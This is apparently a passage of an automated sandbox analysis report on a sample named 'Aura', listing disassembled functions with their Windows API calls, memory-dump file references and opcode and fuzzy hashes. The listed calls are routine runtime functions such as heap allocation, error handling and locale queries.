                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9F0E5B1A052506BE1216724AC0BEEB7BACDF86710F000529F9894A182EA7911458AA3
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,000C02B4,?,00000000,?,?,000BFF54,?,00000007,?,?,000C089A,?,?), ref: 000BBEED
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000C02B4,?,00000000,?,?,000BFF54,?,00000007,?,?,000C089A,?,?), ref: 000BBEF8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                    • Opcode ID: 107d2104c391f188987a2f965272577149946136deac73fd10d5ec8d3807f8be
                                                                                                                                                                                                                                                    • Instruction ID: 206a043dcef30d97eae5c7402e2da3527134cf17679a5a9160e73d5696ec49bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 107d2104c391f188987a2f965272577149946136deac73fd10d5ec8d3807f8be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E08C32209214ABDB112FA4AC08FE93BA8EB40391F104022FA0896172CB798840CBA4
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                                                                                                    • Opcode ID: ea643834be1309ac306953a5102be975dc0333c1d6ad8b56a45ca558255b1c4a
                                                                                                                                                                                                                                                    • Instruction ID: ceeef9a74124a14cb79c9aea1938832ed96be643f516d9d15f936872183155d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea643834be1309ac306953a5102be975dc0333c1d6ad8b56a45ca558255b1c4a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6811E5313867156FF6502BB8ACC7DEF769DAF12764F14053AFA21E50A3DBA48C059170
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: eb9d7b30ea215296f24f97f7a104de0b41d8d3f20604c046c4c15d2e53303bb7
                                                                                                                                                                                                                                                    • Instruction ID: be2e6ef6347f42e93aec0b39db5556952d58d13a3ec682a71850b7f3cbfc0ff5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb9d7b30ea215296f24f97f7a104de0b41d8d3f20604c046c4c15d2e53303bb7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5641B235A0011AAFCB14DFA8C4949EEB7F9FF1A310B54007AE542E7A40E731E945DBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6d85e6d6b11cdd9bbde795b610429005ff1b5c9d5740f7ed2e6c1f67580ac1d5
                                                                                                                                                                                                                                                    • Instruction ID: e300c868efd3ee50b5d6f25f53918cbe85f58e3f9a48721a4f74a7db22dfe30a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d85e6d6b11cdd9bbde795b610429005ff1b5c9d5740f7ed2e6c1f67580ac1d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4531967291011AEFDF14CFA8D890DEDB7F8BF0A320B15426AE516E7690D731E944CBA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000AAFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,000A8A2A,?,?,000AAF87,000A8A2A,?,000AAF58,000A8A2A,?,?,?), ref: 000AAFD0
                                                                                                                                                                                                                                                    • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,F7EDDA51,?,?,?,Function_0002BE94,000000FF), ref: 000AB0C7
                                                                                                                                                                                                                                                      • Part of subcall function 000AAEFA: std::_Throw_Cpp_error.LIBCPMT ref: 000AAF1B
                                                                                                                                                                                                                                                      • Part of subcall function 000AEFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,000A8E4A,000AA2F0), ref: 000AEFE7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3627539351-0
                                                                                                                                                                                                                                                    • Opcode ID: 1dc13a8c9d08c4fc8614b865b88501095658de5bfbcea249abb1a625e72599cc
                                                                                                                                                                                                                                                    • Instruction ID: ffb4ee34d82f952d55edb0dd9bacb2187bb763c3d3153ff55ea3a0621e7e22c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dc13a8c9d08c4fc8614b865b88501095658de5bfbcea249abb1a625e72599cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1104327046459BDB25AFA9DD11EAE7BA5EF43B20F00452FF815876D2CB39D810CA61
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 43367b843a9550c0341cd14813001af87f32f59b675507a08cba2453cde23ab3
                                                                                                                                                                                                                                                    • Instruction ID: 8a11fd3f0a8a119a608b7247b7be8e899aec46a2556e039664b530a2da715d99
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43367b843a9550c0341cd14813001af87f32f59b675507a08cba2453cde23ab3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84012D372201159FAB169F68EC40EAA73A6FBC4760B254027FD04C7094EB35D801D760
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3988221542-0
                                                                                                                                                                                                                                                    • Opcode ID: 9a3a62767f954e61c64b095d12e67e7ec22cc74432bf5b9f97df06975781066e
                                                                                                                                                                                                                                                    • Instruction ID: 908509c0df28ed0edf0cb787ea6a3df66ca4b35c44c06a3c7ebe155689b3ada4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a3a62767f954e61c64b095d12e67e7ec22cc74432bf5b9f97df06975781066e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7001447A7082868FEB599BB8F935AA8BB90FF97334F24816FD011885C2CB135810C710
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,000BC1B7,00000001,00000364,?,00000005,000000FF,?,000B5495,000D8E38,0000000C), ref: 000BD2F5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: c094025714d4a62ef9f9e155bd419eba1d4503aa607507c82e18c3d360e53874
                                                                                                                                                                                                                                                    • Instruction ID: 25ef36feda172ae1d6316b8977cc5b3f302efa457fc67753f51effb171393393
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c094025714d4a62ef9f9e155bd419eba1d4503aa607507c82e18c3d360e53874
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F0E93160152067AF615B669C05BDAB7C9AF51B70F244123BC04E6191EE30DD00D7A1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_Release_chore.LIBCPMT ref: 000A77C6
                                                                                                                                                                                                                                                      • Part of subcall function 000AAF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,000A78DA,00000000), ref: 000AAF72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 312417170-0
                                                                                                                                                                                                                                                    • Opcode ID: 6b4551c0b21b85b46f9a69bb3344534ee0d7110c0c3b5bbabaa2d238021bb118
                                                                                                                                                                                                                                                    • Instruction ID: b0441994f1aeca1bda044e5fe74b217bd46f32d22b556cef764aa44f65e1dea2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b4551c0b21b85b46f9a69bb3344534ee0d7110c0c3b5bbabaa2d238021bb118
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 470178B1D002499BDB00EF84D8057DEBBB4FB05720F00423AE80967381E339AA45CBD2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,000BDF35,?,?,000BDF35,00000220,?,00000000,?), ref: 000BBF43
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: ef83b3452a67bdf4f138616c5b0688f75b3d4f36aeaf54946cfbbc7716aa46bb
                                                                                                                                                                                                                                                    • Instruction ID: 20d7bd8f3aac5115fb6bc7165e8880ed3905afba07632288374c2e38c4e859cd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef83b3452a67bdf4f138616c5b0688f75b3d4f36aeaf54946cfbbc7716aa46bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CE0653110551367EB712A659C00BFF37C89F417A0F150172FC1D96291DFE0DC00DAA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 000A990F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                                                                                    • Opcode ID: 1b6d241cc4fb1f9b0dd9b5caae692abe6c874d92ae031cbf69de18d0bfb40eab
                                                                                                                                                                                                                                                    • Instruction ID: 13aea30754f3e80cbe98e4728a5a922993a2d653a3563d4fb03cedb00f2cabbe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b6d241cc4fb1f9b0dd9b5caae692abe6c874d92ae031cbf69de18d0bfb40eab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81D0A739B015348F4714BB7CE81486E7395FFC972035A085EE840D7346CB28DC428BD0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 000C138F
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 000C13CD
                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 000C13E0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 000C1428
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 000C1443
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                    • String ID: ,K
                                                                                                                                                                                                                                                    • API String ID: 415426439-2737474789
                                                                                                                                                                                                                                                    • Opcode ID: 5c9a5690f162d1d2b49238038267472de92bb8fd2aeed4d6cb7992944b04b07c
                                                                                                                                                                                                                                                    • Instruction ID: 503a076f0861a96d20e783e9545d4de9ecd99f2d95e561a8483d9d6e3f0a2e60
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c9a5690f162d1d2b49238038267472de92bb8fd2aeed4d6cb7992944b04b07c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8516B71A00216ABEB60EFA5CC45FFE77B8AF06704F14446EF905EB192E7709A41CB61
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
